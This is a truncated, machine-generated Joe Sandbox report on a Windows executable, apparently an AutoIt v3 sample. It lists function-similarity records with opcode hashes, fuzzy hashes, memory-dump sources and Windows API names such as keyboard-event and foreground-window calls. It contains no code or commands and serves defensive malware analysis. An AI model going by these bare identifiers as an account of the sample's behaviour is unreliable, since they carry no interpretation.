                                                                            • Opcode ID: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                                            • Instruction ID: 811cbe8b0aa16de1a39a94ec8c22ef8d327900b23b33afa96986f944d6d9b4fc
                                                                            • Opcode Fuzzy Hash: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                                            • Instruction Fuzzy Hash: 86E0B640E1E14745FE78757115458B899800F983F1ED81BB0D93E492C2FD2CB8B34130
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                            • Instruction ID: 6c411836be3890cc31ea08cd8584441c0bce79fb105f6754eed6f279a13d4729
                                                                            • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                            • Instruction Fuzzy Hash: 16E03932608A9182D720DB16F44071AEB70FB8ABC8F944525EF8C47B19CF7DC5628B80
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath
                                                                            • String ID:
                                                                            • API String ID: 82841172-0
                                                                            • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                            • Instruction ID: 4645c9606a90ceddf74555acab45b26ca23796de544a7598462f34749369c798
                                                                            • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                            • Instruction Fuzzy Hash: 28E0D822B0874181D731A739E584798A761FF9C7C4F544031EE8C43B5ADD6CC5D68B10
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_
                                                                            • String ID:
                                                                            • API String ID: 1144537725-0
                                                                            • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                            • Instruction ID: f885a47b308a4a10173a7668b276e639ba0e07944a80d2c2f4dab5fbbd4e45ef
                                                                            • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                            • Instruction Fuzzy Hash: E1F05861A1DB8287E371BB68E404369BAA5FB84388FC44039D18D06396CE3CD316CB20
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Open_onexit
                                                                            • String ID:
                                                                            • API String ID: 3030063568-0
                                                                            • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                            • Instruction ID: 2df7975031d01c18cc58700633822748ca1a0c28963cae571221398b19fc55ad
                                                                            • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                            • Instruction Fuzzy Hash: AAE08C50F1A54F80EA24BB7E9885874C7A0AF91385FC15536C00D82362EE2CD2A78320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentVersionWow64_onexit
                                                                            • String ID:
                                                                            • API String ID: 2932345936-0
                                                                            • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                            • Instruction ID: 1352e59c0d602967deb0e04f5c089872fc7badf16553b9cffbc2b83d17f0b832
                                                                            • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                            • Instruction Fuzzy Hash: D7C00211E6D44B91E72877B948868B455A05FA5394FD00576D10E85292DD1C51FB4731
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _onexit
                                                                            • String ID:
                                                                            • API String ID: 572287377-0
                                                                            • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                            • Instruction ID: 834d8c3a1ecbd0ea11e65221e210a109d521cccfb4cbf089ad124becfb087ebe
                                                                            • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                            • Instruction Fuzzy Hash: 23C01200E5D04B80E62873B9488687445E00FE9391FD00975C00E81282DD1C51FB0721
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _onexit
                                                                            • String ID:
                                                                            • API String ID: 572287377-0
                                                                            • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                            • Instruction ID: 7208ac4a19dd11ff7a85fd56ba027f07cc8e868d6b232a0fe3395c2190414be4
                                                                            • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                            • Instruction Fuzzy Hash: 7CC01201E6E04B80E62873B94C8687845A00FE9340FD40675C00E81282DD2C51F74631
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1452528299-0
                                                                            • Opcode ID: e5acb69707dc582a49b6867ff9037b7b751d07d439139e28c608b8377ee6a61c
                                                                            • Instruction ID: ec6e452df143c2220a39f7102bb3c5898411648e51a25af967c2c619300c5aad
                                                                            • Opcode Fuzzy Hash: e5acb69707dc582a49b6867ff9037b7b751d07d439139e28c608b8377ee6a61c
                                                                            • Instruction Fuzzy Hash: 7C715B22B04A4285EB20FF75D095BBDABA0EB84BC4F804532DE0D57796DF38E466C360
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocHeap
                                                                            • String ID:
                                                                            • API String ID: 4292702814-0
                                                                            • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                            • Instruction ID: 6a605521690687726163bf876aff1459e9b6c0c4727c60262f83f510b888aedf
                                                                            • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                            • Instruction Fuzzy Hash: F8F03A40A0964795FE34B6725C0DE78D9806F44BE0FC88630D82EC92D9DE5DF4628230
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(?,?,00000001,00007FF79783836F,?,?,?,00007FF79783E7E7), ref: 00007FF79783833D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: ee0b3854a55e6d386332b09172a2bebdb13c6c40f32be3cd2150d61c605b23c5
                                                                            • Instruction ID: 9f39132db4fcdcce27fa43145d07170f7dc49be25edeebaab458da7f12e94b0d
                                                                            • Opcode Fuzzy Hash: ee0b3854a55e6d386332b09172a2bebdb13c6c40f32be3cd2150d61c605b23c5
                                                                            • Instruction Fuzzy Hash: 5FE04F63D14A05C6EB145B34D44433862A0E714B7EF510724C63C062C4DF7CC5A58250
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 2211948467-2373415609
                                                                            • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                            • Instruction ID: efbdb5eb16a9daabe79f67397040c770da9c5cb99f809dfc395927f1aa0df929
                                                                            • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                            • Instruction Fuzzy Hash: 32226036A0874286EB20EF39E854969BBA0FB88BD4F944135DE4E47B64DF3CD456CB10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                            • String ID: @GUI_DRAGID$F
                                                                            • API String ID: 1993697042-4164748364
                                                                            • Opcode ID: e7992e5e1d6abc7067500734153cecba052fd935204e75541dffe076f882d139
                                                                            • Instruction ID: bc49370c2e8680bbc95851608d2cfcd4a8bd05b2bfdc5dd2685004876cd6fd47
                                                                            • Opcode Fuzzy Hash: e7992e5e1d6abc7067500734153cecba052fd935204e75541dffe076f882d139
                                                                            • Instruction Fuzzy Hash: 29526232B18A4682EB24BB35D844ABDAB61FF84BD4F944135DB0D43A94CF3CE562C750
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                            • String ID: %d/%02d/%02d
                                                                            • API String ID: 1218376639-328681919
                                                                            • Opcode ID: 90748256b479811e801e2ba2a2da838b4a00620d6b05b427b58448ad522df4ef
                                                                            • Instruction ID: 067753c72628397216dc5887f940f163f5216e8a8721ab9bdedef3ac526946e5
                                                                            • Opcode Fuzzy Hash: 90748256b479811e801e2ba2a2da838b4a00620d6b05b427b58448ad522df4ef
                                                                            • Instruction Fuzzy Hash: 1E12D132B0965286FB70AB359898EBDABA4EF84BD4F804131DA5D47B94DF3CD4638710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                            • String ID: P
                                                                            • API String ID: 1208186926-3110715001
                                                                            • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                            • Instruction ID: 11104168c192ab25acdee7371144112a609e964f385f8c374f32fa49ec79b7fe
                                                                            • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                            • Instruction Fuzzy Hash: E312F372A0864286E734AB35D494FBDABA0FF85BD4F804536DA5D07A94CF3CE462C760
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-2439800395
                                                                            • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                            • Instruction ID: 25c24b678e3cfe0342a050e644b30802d6cec002482ef0fc70da27337bd8b222
                                                                            • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                            • Instruction Fuzzy Hash: 37E1637660878286E724EF35E844A69BBA0FB88BD4F904135DE4E47B64CF7CE456CB10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 3778422247-2988720461
                                                                            • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                            • Instruction ID: 23acbd0c41235cd0c1c97a6a59ccb638960560eba127b65051039dafe9c5d778
                                                                            • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                            • Instruction Fuzzy Hash: 62417225B0861283E7747B36AC18A3AAA91BFC8BD1FD54031D94A47B54DF3DA85B8360
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                            • String ID:
                                                                            • API String ID: 3372153169-0
                                                                            • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                            • Instruction ID: d406336a714f754a9281419ce141ba7f06292a79dcf21442d2b225290c585fa0
                                                                            • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                            • Instruction Fuzzy Hash: 1F22A022A09A4385EB74BB39D454A7DAB61EF84BD4FD44531CA1E0B794DF3CE4A2C321
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2880407647-0
                                                                            • Opcode ID: ce3caaf699caba12f71b3e9f0da339f933c6cfb778c9e215de14da521d683320
                                                                            • Instruction ID: 4ca0480f7db8ecd2c4d9cf293e7ccfcda55bc8da2679913c521c229058958867
                                                                            • Opcode Fuzzy Hash: ce3caaf699caba12f71b3e9f0da339f933c6cfb778c9e215de14da521d683320
                                                                            • Instruction Fuzzy Hash: DF03F472A186C28BD7759E349540FFDBBA5FB847CCF804135DA095BB89DB38A912CB10
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                            • String ID:
                                                                            • API String ID: 1015379403-0
                                                                            • Opcode ID: 58bad277089d6943eb67c93669011f140949b798b06aa56c89bf1379fa04f349
                                                                            • Instruction ID: b1c4f4edf06c666f1928038bc083433bacd855573a2fda9dd19e605d7e8f9917
                                                                            • Opcode Fuzzy Hash: 58bad277089d6943eb67c93669011f140949b798b06aa56c89bf1379fa04f349
                                                                            • Instruction Fuzzy Hash: 1E02B661A0968289EB30AF359888ABDAB61FF847E4FD44131DA5D07AD4CF3CE567C710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
